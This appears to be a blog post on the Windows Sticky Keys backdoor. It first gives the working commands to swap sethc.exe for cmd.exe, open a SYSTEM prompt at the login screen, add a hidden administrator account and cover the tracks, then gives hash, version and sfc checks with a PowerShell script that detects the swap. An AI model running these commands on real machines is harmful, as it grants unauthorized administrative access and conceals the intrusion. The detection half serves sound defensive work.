Saturday, July 5, 2025

sethc.exe

  1. Replace sethc.exe with cmd.exe: Open a command prompt with administrative privileges and run the following, first backing up the original and then overwriting it with a copy of cmd.exe. Note that on current Windows versions files in System32 are owned by TrustedInstaller, so the second copy fails with "Access is denied" unless ownership and write permission on sethc.exe have been taken first.
  • copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bak
  • copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
  2. Trigger the backdoor: At the login screen, press the Shift key five times. Winlogon launches the Sticky Keys helper (sethc.exe) on the logon desktop, so the copied cmd.exe opens a command prompt running as SYSTEM, with no credentials required.
  3. Create a new user: In that command prompt, create a new user account and add it to the local Administrators group:
  • net user joe P@ssw0rd /add
  • net localgroup administrators joe /add
  • Username: joe
  • Password: P@ssw0rd
  4. Restore sethc.exe: To cover their tracks, the attacker can restore the original sethc.exe from the backup (and should delete the .bak file, which is otherwise a telltale artifact):
  • copy C:\Windows\System32\sethc.exe.bak C:\Windows\System32\sethc.exe



Detecting Unauthorized Changes:

  1. Verify File Hashes: Compute the SHA-256 hash of sethc.exe with PowerShell and compare it with a known-good copy from a clean installation of the same Windows build. A swapped file also hashes identically to cmd.exe on the same machine, which is a quick check that needs no reference value:
  • Get-FileHash C:\Windows\System32\sethc.exe -Algorithm SHA256
  2. Check File Properties: Ensure the properties of sethc.exe (size, version resource, file description and original filename) match those of a standard Windows installation. An Authenticode signature check alone is not sufficient here, because cmd.exe is itself a validly signed Microsoft binary and a renamed copy still verifies against the Windows catalog.
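The following PowerShell script combines the two checks above into one pass and also looks for the leftover sethc.exe.bak. It is an added example, not code from the original post; the paths are the standard System32 locations, and the comparison against cmd.exe assumes the replacement was a straight copy as described in the walkthrough (a modified binary would need the comparison against a known-good hash instead). Run it from an elevated PowerShell prompt.

```powershell
# Added example: detect a sethc.exe that has been swapped for cmd.exe.
$sethc = 'C:\Windows\System32\sethc.exe'
$cmd   = 'C:\Windows\System32\cmd.exe'
$findings = @()

# Check 1: a copied cmd.exe hashes identically to the real cmd.exe.
$sethcHash = (Get-FileHash -Path $sethc -Algorithm SHA256).Hash
$cmdHash   = (Get-FileHash -Path $cmd   -Algorithm SHA256).Hash
"sethc.exe SHA256: $sethcHash"
"cmd.exe   SHA256: $cmdHash"
if ($sethcHash -eq $cmdHash) {
    $findings += 'sethc.exe is byte-for-byte identical to cmd.exe'
}

# Check 2: the version resource of a copied cmd.exe still identifies it as
# the command processor, not as the Sticky Keys helper.
$sethcInfo = (Get-Item -Path $sethc).VersionInfo
$cmdInfo   = (Get-Item -Path $cmd).VersionInfo
"sethc.exe OriginalFilename: $($sethcInfo.OriginalFilename)  FileDescription: $($sethcInfo.FileDescription)"
if ($sethcInfo.OriginalFilename -eq $cmdInfo.OriginalFilename -or
    $sethcInfo.FileDescription  -eq $cmdInfo.FileDescription) {
    $findings += 'sethc.exe version resource matches cmd.exe'
}

# Check 3: the backup left behind by the copy-based swap.
if (Test-Path -Path "$sethc.bak") {
    $findings += "backup file present: $sethc.bak"
}

if ($findings.Count -eq 0) {
    'No sign of a sethc.exe swap'
} else {
    foreach ($f in $findings) { Write-Warning $f }
}
```

Because Check 2 compares sethc.exe's version fields with cmd.exe's rather than with hard-coded strings, it does not depend on the exact wording of the resource on a given Windows build. As an independent cross-check, the Windows Resource Checker can verify the file against the protected-file store with `sfc /verifyfile=C:\Windows\System32\sethc.exe`, which reports a hash mismatch for a replaced binary.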
